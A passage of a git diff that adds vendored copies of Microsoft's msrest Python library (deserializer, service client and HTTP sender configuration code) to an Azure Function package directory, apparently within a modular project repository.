to deserialize to. + :param requests.Response response_data: REST response object. + :param str content_type: Swagger "produces" if available. + :raises: DeserializationError if deserialization fails. + :return: Deserialized object. + """ + data = self._unpack_content(response_data, content_type) + return self._deserialize(target_obj, data) + + def _deserialize(self, target_obj, data): + """Call the deserializer on a model. + + Data needs to be already deserialized as JSON or XML ElementTree + + :param str target_obj: Target data type to deserialize to. + :param object data: Object to deserialize. + :raises: DeserializationError if deserialization fails. + :return: Deserialized object. + """ + # This is already a model, go recursive just in case + if hasattr(data, "_attribute_map"): + constants = [name for name, config in getattr(data, '_validation', {}).items() + if config.get('constant')] + try: + for attr, mapconfig in data._attribute_map.items(): + if attr in constants: + continue + value = getattr(data, attr) + if value is None: + continue + local_type = mapconfig['type'] + internal_data_type = local_type.strip('[]{}') + if internal_data_type not in self.dependencies or isinstance(internal_data_type, Enum): + continue + setattr( + data, + attr, + self._deserialize(local_type, value) + ) + return data + except AttributeError: + return + + response, class_name = self._classify_target(target_obj, data) + + if isinstance(response, basestring): + return self.deserialize_data(data, response) + elif isinstance(response, type) and issubclass(response, Enum): + return self.deserialize_enum(data, response) + + if data is None: + return data + try: + attributes = response._attribute_map + d_attrs = {} + for attr, attr_desc in attributes.items(): + # Check empty string. If it's not empty, someone has a real "additionalProperties"... + if attr == "additional_properties" and attr_desc["key"] == '': + continue + raw_value = None + # Enhance attr_desc with some dynamic data + attr_desc = attr_desc.copy() # Do a copy, do not change the real one + internal_data_type = attr_desc["type"].strip('[]{}') + if internal_data_type in self.dependencies: + attr_desc["internalType"] = self.dependencies[internal_data_type] + + for key_extractor in self.key_extractors: + found_value = key_extractor(attr, attr_desc, data) + if found_value is not None: + if raw_value is not None and raw_value != found_value: + msg = ("Ignoring extracted value '%s' from %s for key '%s'" + " (duplicate extraction, follow extractors order)" ) + _LOGGER.warning( + msg, + found_value, + key_extractor, + attr + ) + continue + raw_value = found_value + + value = self.deserialize_data(raw_value, attr_desc['type']) + d_attrs[attr] = value + except (AttributeError, TypeError, KeyError) as err: + msg = "Unable to deserialize to object: " + class_name + raise_with_traceback(DeserializationError, msg, err) + else: + additional_properties = self._build_additional_properties(attributes, data) + return self._instantiate_model(response, d_attrs, additional_properties) + + def _build_additional_properties(self, attribute_map, data): + if not self.additional_properties_detection: + return None + if "additional_properties" in attribute_map and attribute_map.get("additional_properties", {}).get("key") != '': + # Check empty string. If it's not empty, someone has a real "additionalProperties" + return None + if isinstance(data, ET.Element): + data = {el.tag: el.text for el in data} + + known_keys = {_decode_attribute_map_key(_FLATTEN.split(desc['key'])[0]) + for desc in attribute_map.values() if desc['key'] != ''} + present_keys = set(data.keys()) + missing_keys = present_keys - known_keys + return {key: data[key] for key in missing_keys} + + def _classify_target(self, target, data): + """Check to see whether the deserialization target object can + be classified into a subclass. + Once classification has been determined, initialize object. + + :param str target: The target object type to deserialize to. + :param str/dict data: The response data to deseralize. + """ + if target is None: + return None, None + + if isinstance(target, basestring): + try: + target = self.dependencies[target] + except KeyError: + return target, target + + try: + target = target._classify(data, self.dependencies) + except AttributeError: + pass # Target is not a Model, no classify + return target, target.__class__.__name__ + + def failsafe_deserialize(self, target_obj, data, content_type=None): + """Ignores any errors encountered in deserialization, + and falls back to not deserializing the object. Recommended + for use in error deserialization, as we want to return the + HttpResponseError to users, and not have them deal with + a deserialization error. + + :param str target_obj: The target object type to deserialize to. + :param str/dict data: The response data to deseralize. + :param str content_type: Swagger "produces" if available. + """ + try: + return self(target_obj, data, content_type=content_type) + except: + _LOGGER.warning( + "Ran into a deserialization error. Ignoring since this is failsafe deserialization", + exc_info=True + ) + return None + + @staticmethod + def _unpack_content(raw_data, content_type=None): + """Extract the correct structure for deserialization. + + If raw_data is a PipelineResponse, try to extract the result of RawDeserializer. + if we can't, raise. Your Pipeline should have a RawDeserializer. + + If not a pipeline response and raw_data is bytes or string, use content-type + to decode it. If no content-type, try JSON. + + If raw_data is something else, bypass all logic and return it directly. + + :param raw_data: Data to be processed. + :param content_type: How to parse if raw_data is a string/bytes. + :raises JSONDecodeError: If JSON is requested and parsing is impossible. + :raises UnicodeDecodeError: If bytes is not UTF8 + """ + # This avoids a circular dependency. We might want to consider RawDesializer is more generic + # than the pipeline concept, and put it in a toolbox, used both here and in pipeline. TBD. + from .pipeline.universal import RawDeserializer + + # Assume this is enough to detect a Pipeline Response without importing it + context = getattr(raw_data, "context", {}) + if context: + if RawDeserializer.CONTEXT_NAME in context: + return context[RawDeserializer.CONTEXT_NAME] + raise ValueError("This pipeline didn't have the RawDeserializer policy; can't deserialize") + + #Assume this is enough to recognize universal_http.ClientResponse without importing it + if hasattr(raw_data, "body"): + return RawDeserializer.deserialize_from_http_generics( + raw_data.text(), + raw_data.headers + ) + + # Assume this enough to recognize requests.Response without importing it. + if hasattr(raw_data, '_content_consumed'): + return RawDeserializer.deserialize_from_http_generics( + raw_data.text, + raw_data.headers + ) + + if isinstance(raw_data, (basestring, bytes)) or hasattr(raw_data, 'read'): + return RawDeserializer.deserialize_from_text(raw_data, content_type) + return raw_data + + def _instantiate_model(self, response, attrs, additional_properties=None): + """Instantiate a response model passing in deserialized args. + + :param response: The response model class. + :param d_attrs: The deserialized response attributes. + """ + if callable(response): + subtype = getattr(response, '_subtype_map', {}) + try: + readonly = [k for k, v in response._validation.items() + if v.get('readonly')] + const = [k for k, v in response._validation.items() + if v.get('constant')] + kwargs = {k: v for k, v in attrs.items() + if k not in subtype and k not in readonly + const} + response_obj = response(**kwargs) + for attr in readonly: + setattr(response_obj, attr, attrs.get(attr)) + if additional_properties: + response_obj.additional_properties = additional_properties + return response_obj + except TypeError as err: + msg = "Unable to deserialize {} into model {}. ".format( + kwargs, response) + raise DeserializationError(msg + str(err)) + else: + try: + for attr, value in attrs.items(): + setattr(response, attr, value) + return response + except Exception as exp: + msg = "Unable to populate response model. " + msg += "Type: {}, Error: {}".format(type(response), exp) + raise DeserializationError(msg) + + def deserialize_data(self, data, data_type): + """Process data for deserialization according to data type. + + :param str data: The response string to be deserialized. + :param str data_type: The type to deserialize to. + :raises: DeserializationError if deserialization fails. + :return: Deserialized object. + """ + if data is None: + return data + + try: + if not data_type: + return data + if data_type in self.basic_types.values(): + return self.deserialize_basic(data, data_type) + if data_type in self.deserialize_type: + if isinstance(data, self.deserialize_expected_types.get(data_type, tuple())): + return data + + is_a_text_parsing_type = lambda x: x not in ["object", "[]", r"{}"] + if isinstance(data, ET.Element) and is_a_text_parsing_type(data_type) and not data.text: + return None + data_val = self.deserialize_type[data_type](data) + return data_val + + iter_type = data_type[0] + data_type[-1] + if iter_type in self.deserialize_type: + return self.deserialize_type[iter_type](data, data_type[1:-1]) + + obj_type = self.dependencies[data_type] + if issubclass(obj_type, Enum): + if isinstance(data, ET.Element): + data = data.text + return self.deserialize_enum(data, obj_type) + + except (ValueError, TypeError, AttributeError) as err: + msg = "Unable to deserialize response data." + msg += " Data: {}, {}".format(data, data_type) + raise_with_traceback(DeserializationError, msg, err) + else: + return self._deserialize(obj_type, data) + + def deserialize_iter(self, attr, iter_type): + """Deserialize an iterable. + + :param list attr: Iterable to be deserialized. + :param str iter_type: The type of object in the iterable. + :rtype: list + """ + if attr is None: + return None + if isinstance(attr, ET.Element): # If I receive an element here, get the children + attr = list(attr) + if not isinstance(attr, (list, set)): + raise DeserializationError("Cannot deserialize as [{}] an object of type {}".format( + iter_type, + type(attr) + )) + return [self.deserialize_data(a, iter_type) for a in attr] + + def deserialize_dict(self, attr, dict_type): + """Deserialize a dictionary. + + :param dict/list attr: Dictionary to be deserialized. Also accepts + a list of key, value pairs. + :param str dict_type: The object type of the items in the dictionary. + :rtype: dict + """ + if isinstance(attr, list): + return {x['key']: self.deserialize_data(x['value'], dict_type) for x in attr} + + if isinstance(attr, ET.Element): + # Transform value into {"Key": "value"} + attr = {el.tag: el.text for el in attr} + return {k: self.deserialize_data(v, dict_type) for k, v in attr.items()} + + def deserialize_object(self, attr, **kwargs): + """Deserialize a generic object. + This will be handled as a dictionary. + + :param dict attr: Dictionary to be deserialized. + :rtype: dict + :raises: TypeError if non-builtin datatype encountered. + """ + if attr is None: + return None + if isinstance(attr, ET.Element): + # Do no recurse on XML, just return the tree as-is + return attr + if isinstance(attr, basestring): + return self.deserialize_basic(attr, 'str') + obj_type = type(attr) + if obj_type in self.basic_types: + return self.deserialize_basic(attr, self.basic_types[obj_type]) + if obj_type is _long_type: + return self.deserialize_long(attr) + + if obj_type == dict: + deserialized = {} + for key, value in attr.items(): + try: + deserialized[key] = self.deserialize_object( + value, **kwargs) + except ValueError: + deserialized[key] = None + return deserialized + + if obj_type == list: + deserialized = [] + for obj in attr: + try: + deserialized.append(self.deserialize_object( + obj, **kwargs)) + except ValueError: + pass + return deserialized + + else: + error = "Cannot deserialize generic object with type: " + raise TypeError(error + str(obj_type)) + + def deserialize_basic(self, attr, data_type): + """Deserialize basic builtin data type from string. + Will attempt to convert to str, int, float and bool. + This function will also accept '1', '0', 'true' and 'false' as + valid bool values. + + :param str attr: response string to be deserialized. + :param str data_type: deserialization data type. + :rtype: str, int, float or bool + :raises: TypeError if string format is not valid. + """ + # If we're here, data is supposed to be a basic type. + # If it's still an XML node, take the text + if isinstance(attr, ET.Element): + attr = attr.text + if not attr: + if data_type == "str": + # None or '', node is empty string. + return '' + else: + # None or '', node with a strong type is None. + # Don't try to model "empty bool" or "empty int" + return None + + if data_type == 'bool': + if attr in [True, False, 1, 0]: + return bool(attr) + elif isinstance(attr, basestring): + if attr.lower() in ['true', '1']: + return True + elif attr.lower() in ['false', '0']: + return False + raise TypeError("Invalid boolean value: {}".format(attr)) + + if data_type == 'str': + return self.deserialize_unicode(attr) + return eval(data_type)(attr) + + @staticmethod + def deserialize_unicode(data): + """Preserve unicode objects in Python 2, otherwise return data + as a string. + + :param str data: response string to be deserialized. + :rtype: str or unicode + """ + # We might be here because we have an enum modeled as string, + # and we try to deserialize a partial dict with enum inside + if isinstance(data, Enum): + return data + + # Consider this is real string + try: + if isinstance(data, unicode): + return data + except NameError: + return str(data) + else: + return str(data) + + @staticmethod + def deserialize_enum(data, enum_obj): + """Deserialize string into enum object. + + If the string is not a valid enum value it will be returned as-is + and a warning will be logged. + + :param str data: Response string to be deserialized. If this value is + None or invalid it will be returned as-is. + :param Enum enum_obj: Enum object to deserialize to. + :rtype: Enum + """ + if isinstance(data, enum_obj) or data is None: + return data + if isinstance(data, Enum): + data = data.value + if isinstance(data, int): + # Workaround. We might consider remove it in the future. + # https://github.com/Azure/azure-rest-api-specs/issues/141 + try: + return list(enum_obj.__members__.values())[data] + except IndexError: + error = "{!r} is not a valid index for enum {!r}" + raise DeserializationError(error.format(data, enum_obj)) + try: + return enum_obj(str(data)) + except ValueError: + for enum_value in enum_obj: + if enum_value.value.lower() == str(data).lower(): + return enum_value + # We don't fail anymore for unknown value, we deserialize as a string + _LOGGER.warning("Deserializer is not able to find %s as valid enum in %s", data, enum_obj) + return Deserializer.deserialize_unicode(data) + + @staticmethod + def deserialize_bytearray(attr): + """Deserialize string into bytearray. + + :param str attr: response string to be deserialized. + :rtype: bytearray + :raises: TypeError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + return bytearray(b64decode(attr)) + + @staticmethod + def deserialize_base64(attr): + """Deserialize base64 encoded string into string. + + :param str attr: response string to be deserialized. + :rtype: bytearray + :raises: TypeError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + padding = '=' * (3 - (len(attr) + 3) % 4) + attr = attr + padding + encoded = attr.replace('-', '+').replace('_', '/') + return b64decode(encoded) + + @staticmethod + def deserialize_decimal(attr): + """Deserialize string into Decimal object. + + :param str attr: response string to be deserialized. + :rtype: Decimal + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + try: + return decimal.Decimal(attr) + except decimal.DecimalException as err: + msg = "Invalid decimal {}".format(attr) + raise_with_traceback(DeserializationError, msg, err) + + @staticmethod + def deserialize_long(attr): + """Deserialize string into long (Py2) or int (Py3). + + :param str attr: response string to be deserialized. + :rtype: long or int + :raises: ValueError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + return _long_type(attr) + + @staticmethod + def deserialize_duration(attr): + """Deserialize ISO-8601 formatted string into TimeDelta object. + + :param str attr: response string to be deserialized. + :rtype: TimeDelta + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + try: + duration = isodate.parse_duration(attr) + except(ValueError, OverflowError, AttributeError) as err: + msg = "Cannot deserialize duration object." + raise_with_traceback(DeserializationError, msg, err) + else: + return duration + + @staticmethod + def deserialize_date(attr): + """Deserialize ISO-8601 formatted string into Date object. + + :param str attr: response string to be deserialized. + :rtype: Date + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + if re.search(r"[^\W\d_]", attr, re.I + re.U): + raise DeserializationError("Date must have only digits and -. Received: %s" % attr) + # This must NOT use defaultmonth/defaultday. Using None ensure this raises an exception. + return isodate.parse_date(attr, defaultmonth=None, defaultday=None) + + @staticmethod + def deserialize_time(attr): + """Deserialize ISO-8601 formatted string into time object. + + :param str attr: response string to be deserialized. + :rtype: datetime.time + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + if re.search(r"[^\W\d_]", attr, re.I + re.U): + raise DeserializationError("Date must have only digits and -. Received: %s" % attr) + return isodate.parse_time(attr) + + @staticmethod + def deserialize_rfc(attr): + """Deserialize RFC-1123 formatted string into Datetime object. + + :param str attr: response string to be deserialized. + :rtype: Datetime + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + try: + parsed_date = email.utils.parsedate_tz(attr) + date_obj = datetime.datetime( + *parsed_date[:6], + tzinfo=_FixedOffset(datetime.timedelta(minutes=(parsed_date[9] or 0)/60)) + ) + if not date_obj.tzinfo: + date_obj = date_obj.astimezone(tz=TZ_UTC) + except ValueError as err: + msg = "Cannot deserialize to rfc datetime object." + raise_with_traceback(DeserializationError, msg, err) + else: + return date_obj + + @staticmethod + def deserialize_iso(attr): + """Deserialize ISO-8601 formatted string into Datetime object. + + :param str attr: response string to be deserialized. + :rtype: Datetime + :raises: DeserializationError if string format invalid. + """ + if isinstance(attr, ET.Element): + attr = attr.text + try: + attr = attr.upper() + match = Deserializer.valid_date.match(attr) + if not match: + raise ValueError("Invalid datetime string: " + attr) + + check_decimal = attr.split('.') + if len(check_decimal) > 1: + decimal_str = "" + for digit in check_decimal[1]: + if digit.isdigit(): + decimal_str += digit + else: + break + if len(decimal_str) > 6: + attr = attr.replace(decimal_str, decimal_str[0:6]) + + date_obj = isodate.parse_datetime(attr) + test_utc = date_obj.utctimetuple() + if test_utc.tm_year > 9999 or test_utc.tm_year < 1: + raise OverflowError("Hit max or min date") + except(ValueError, OverflowError, AttributeError) as err: + msg = "Cannot deserialize datetime object." + raise_with_traceback(DeserializationError, msg, err) + else: + return date_obj + + @staticmethod + def deserialize_unix(attr): + """Serialize Datetime object into IntTime format. + This is represented as seconds. + + :param int attr: Object to be serialized. + :rtype: Datetime + :raises: DeserializationError if format invalid + """ + if isinstance(attr, ET.Element): + attr = int(attr.text) + try: + date_obj = datetime.datetime.fromtimestamp(attr, TZ_UTC) + except ValueError as err: + msg = "Cannot deserialize to unix datetime object." + raise_with_traceback(DeserializationError, msg, err) + else: + return date_obj diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/service_client.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/service_client.py new file mode 100644 index 0000000..22f0bdd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/service_client.py @@ -0,0 +1,388 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import os +import sys +try: + from urlparse import urljoin, urlparse +except ImportError: + from urllib.parse import urljoin, urlparse +import warnings + +from typing import List, Any, Dict, Union, IO, Tuple, Optional, Callable, Iterator, cast, TYPE_CHECKING # pylint: disable=unused-import + +from .authentication import Authentication +from .universal_http import ClientRequest, ClientResponse +from .universal_http.requests import ( + RequestsHTTPSender, +) +from .pipeline import Request, Pipeline, HTTPPolicy, SansIOHTTPPolicy +from .pipeline.requests import ( + PipelineRequestsHTTPSender, + RequestsCredentialsPolicy, + RequestsPatchSession +) +from .pipeline.universal import ( + HTTPLogger, + RawDeserializer +) + + +if TYPE_CHECKING: + from .configuration import Configuration # pylint: disable=unused-import + from .universal_http.requests import RequestsClientResponse # pylint: disable=unused-import + import requests # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + +class SDKClient(object): + """The base class of all generated SDK client. + """ + def __init__(self, creds, config): + # type: (Any, Configuration) -> None + self._client = ServiceClient(creds, config) + + def close(self): + # type: () -> None + """Close the client if keep_alive is True. + """ + self._client.close() + + def __enter__(self): + # type: () -> SDKClient + self._client.__enter__() + return self + + def __exit__(self, *exc_details): + self._client.__exit__(*exc_details) + + +class _ServiceClientCore(object): + """Service client core methods. + + This contains methods are sans I/O and not tight to sync or async implementation. + :param Configuration config: Service configuration. + :param Authentication creds: Authenticated credentials. + """ + + def __init__(self, config): + # type: (Any, Configuration) -> None + if config is None: + raise ValueError("Config is a required parameter") + self.config = config + + def _request(self, method, url, params, headers, content, form_content): + # type: (str, str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create ClientRequest object. + + :param str url: URL for the request. + :param dict params: URL query parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = ClientRequest(method, self.format_url(url)) + + if params: + request.format_parameters(params) + + if headers: + request.headers.update(headers) + # All requests should contain a Accept. + # This should be done by Autorest, but wasn't in old Autorest + # Force it for now, but might deprecate it later. + if "Accept" not in request.headers: + _LOGGER.debug("Accept header absent and forced to application/json") + request.headers['Accept'] = 'application/json' + + if content is not None: + request.add_content(content) + + if form_content: + request.add_formdata(form_content) + + return request + + def stream_upload(self, data, callback): + """Generator for streaming request body data. + + :param data: A file-like object to be streamed. + :param callback: Custom callback for monitoring progress. + """ + while True: + chunk = data.read(self.config.connection.data_block_size) + if not chunk: + break + if callback and callable(callback): + callback(chunk, response=None) + yield chunk + + def format_url(self, url, **kwargs): + # type: (str, Any) -> str + """Format request URL with the client base URL, unless the + supplied URL is already absolute. + + :param str url: The request URL to be formatted if necessary. + """ + url = url.format(**kwargs) + parsed = urlparse(url) + if not parsed.scheme or not parsed.netloc: + url = url.lstrip('/') + base = self.config.base_url.format(**kwargs).rstrip('/') + url = urljoin(base + '/', url) + return url + + def get(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a GET request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('GET', url, params, headers, content, form_content) + request.method = 'GET' + return request + + def put(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a PUT request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('PUT', url, params, headers, content, form_content) + return request + + def post(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a POST request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('POST', url, params, headers, content, form_content) + return request + + def head(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a HEAD request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('HEAD', url, params, headers, content, form_content) + return request + + def patch(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a PATCH request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('PATCH', url, params, headers, content, form_content) + return request + + def delete(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a DELETE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('DELETE', url, params, headers, content, form_content) + return request + + def merge(self, url, params=None, headers=None, content=None, form_content=None): + # type: (str, Optional[Dict[str, str]], Optional[Dict[str, str]], Any, Optional[Dict[str, Any]]) -> ClientRequest + """Create a MERGE request object. + + :param str url: The request URL. + :param dict params: Request URL parameters. + :param dict headers: Headers + :param dict form_content: Form content + """ + request = self._request('MERGE', url, params, headers, content, form_content) + return request + + +class ServiceClient(_ServiceClientCore): + """REST Service Client. + Maintains client pipeline and handles all requests and responses. + + :param creds: Deprecated, will be removed in next major version. Creds are now read from config.credentials. + :param Configuration config: Service configuration. + """ + + def __init__(self, creds, config): + # type: (Any, Configuration) -> None + super(ServiceClient, self).__init__(config) + + # If not Autorest, check if credentials comes from here and not config + if creds and config.credentials is None: + warnings.warn("Creds parameter is deprecated. Set config.credentials instead.", + DeprecationWarning) + config.credentials = creds + + self.config.pipeline = self._create_default_pipeline() + + def _create_default_pipeline(self): + # type: () -> Pipeline[ClientRequest, RequestsClientResponse] + creds = self.config.credentials + + policies = [ + self.config.user_agent_policy, # UserAgent policy + RequestsPatchSession(), # Support deprecated operation config at the session level + self.config.http_logger_policy # HTTP request/response log + ] # type: List[Union[HTTPPolicy, SansIOHTTPPolicy]] + if creds: + if isinstance(creds, (HTTPPolicy, SansIOHTTPPolicy)): + policies.insert(1, creds) + else: + # Assume this is the old credentials class, and then requests. Wrap it. + policies.insert(1, RequestsCredentialsPolicy(creds)) # Set credentials for requests based session + + return Pipeline( + policies, + PipelineRequestsHTTPSender(RequestsHTTPSender(self.config)) # Send HTTP request using requests + ) + + def __enter__(self): + # type: () -> ServiceClient + self.config.keep_alive = True + self.config.pipeline.__enter__() + return self + + def __exit__(self, *exc_details): + self.config.pipeline.__exit__(*exc_details) + self.config.keep_alive = False + + def close(self): + # type: () -> None + """Close the pipeline if keep_alive is True. + """ + self.config.pipeline.__exit__() # type: ignore + + def send_formdata(self, request, headers=None, content=None, **config): + """Send data as a multipart form-data request. + We only deal with file-like objects or strings at this point. + The requests is not yet streamed. + + This method is deprecated, and shouldn't be used anymore. + + :param ClientRequest request: The request object to be sent. + :param dict headers: Any headers to add to the request. + :param dict content: Dictionary of the fields of the formdata. + :param config: Any specific config overrides. + """ + request.headers = headers + request.add_formdata(content) + return self.send(request, **config) + + def send(self, request, headers=None, content=None, **kwargs): + """Prepare and send request object according to configuration. + + :param ClientRequest request: The request object to be sent. + :param dict headers: Any headers to add to the request. + :param content: Any body data to add to the request. + :param config: Any specific config overrides + """ + # "content" and "headers" are deprecated, only old SDK + if headers: + request.headers.update(headers) + if not request.files and request.data is None and content is not None: + request.add_content(content) + # End of deprecation + + response = None + kwargs.setdefault('stream', True) + try: + pipeline_response = self.config.pipeline.run(request, **kwargs) + # There is too much thing that expects this method to return a "requests.Response" + # to break it in a compatible release. + # Also, to be pragmatic in the "sync" world "requests" rules anyway. + # However, attach the Universal HTTP response + # to get the streaming generator. + response = pipeline_response.http_response.internal_response + response._universal_http_response = pipeline_response.http_response + response.context = pipeline_response.context + return response + finally: + self._close_local_session_if_necessary(response, kwargs['stream']) + + def _close_local_session_if_necessary(self, response, stream): + # Here, it's a local session, I might close it. + if not self.config.keep_alive and (not response or not stream): + self.config.pipeline._sender.driver.session.close() + + def stream_download(self, data, callback): + # type: (Union[requests.Response, ClientResponse], Callable) -> Iterator[bytes] + """Generator for streaming request body data. + + :param data: A response object to be streamed. + :param callback: Custom callback for monitoring progress. + """ + block = self.config.connection.data_block_size + try: + # Assume this is ClientResponse, which it should be if backward compat was not important + return cast(ClientResponse, data).stream_download(block, callback) + except AttributeError: + try: + # Assume this is the patched requests.Response from "send" + return data._universal_http_response.stream_download(block, callback) # type: ignore + except AttributeError: + # Assume this is a raw requests.Response + from .universal_http.requests import RequestsClientResponse + response = RequestsClientResponse(None, data) + return response.stream_download(block, callback) + + def add_header(self, header, value): + # type: (str, str) -> None + """Add a persistent header - this header will be applied to all + requests sent during the current client session. + + .. deprecated:: 0.5.0 + Use config.headers instead + + :param str header: The header name. + :param str value: The header value. + """ + warnings.warn("Private attribute _client.add_header is deprecated. Use config.headers instead.", + DeprecationWarning) + self.config.headers[header] = value diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__init__.py new file mode 100644 index 0000000..1811364 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/__init__.py @@ -0,0 +1,460 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import abc +try: + import configparser + from configparser import NoOptionError +except ImportError: + import ConfigParser as configparser # type: ignore + from ConfigParser import NoOptionError # type: ignore +import json +import logging +import os.path +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse +import xml.etree.ElementTree as ET + +from typing import TYPE_CHECKING, Generic, TypeVar, cast, IO, List, Union, Any, Mapping, Dict, Optional, Tuple, Callable, Iterator, MutableMapping # pylint: disable=unused-import + +HTTPResponseType = TypeVar("HTTPResponseType", bound='HTTPClientResponse') + +# This file is NOT using any "requests" HTTP implementation +# However, the CaseInsensitiveDict is handy. +# If one day we reach the point where "requests" can be skip totally, +# might provide our own implementation +from requests.structures import CaseInsensitiveDict + +from ..exceptions import ClientRequestError, raise_with_traceback + +if TYPE_CHECKING: + from ..serialization import Model # pylint: disable=unused-import + + +_LOGGER = logging.getLogger(__name__) + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore + +try: + from contextlib import AbstractContextManager # type: ignore +except ImportError: # Python <= 3.5 + class AbstractContextManager(object): # type: ignore + def __enter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + def __exit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + +class HTTPSender(AbstractContextManager, ABC): + """An http sender ABC. + """ + + @abc.abstractmethod + def send(self, request, **config): + # type: (ClientRequest, Any) -> ClientResponse + """Send the request using this HTTP sender. + """ + pass + + +class HTTPSenderConfiguration(object): + """HTTP sender configuration. + + This is composed of generic HTTP configuration, and could be use as a common + HTTP configuration format. + + :param str filepath: Path to existing config file (optional). + """ + + def __init__(self, filepath=None): + # Communication configuration + self.connection = ClientConnection() + + # Headers (sent with every requests) + self.headers = {} # type: Dict[str, str] + + # ProxyConfiguration + self.proxies = ClientProxies() + + # Redirect configuration + self.redirect_policy = ClientRedirectPolicy() + + self._config = configparser.ConfigParser() + self._config.optionxform = str # type: ignore + + if filepath: + self.load(filepath) + + def _clear_config(self): + # type: () -> None + """Clearout config object in memory.""" + for section in self._config.sections(): + self._config.remove_section(section) + + def 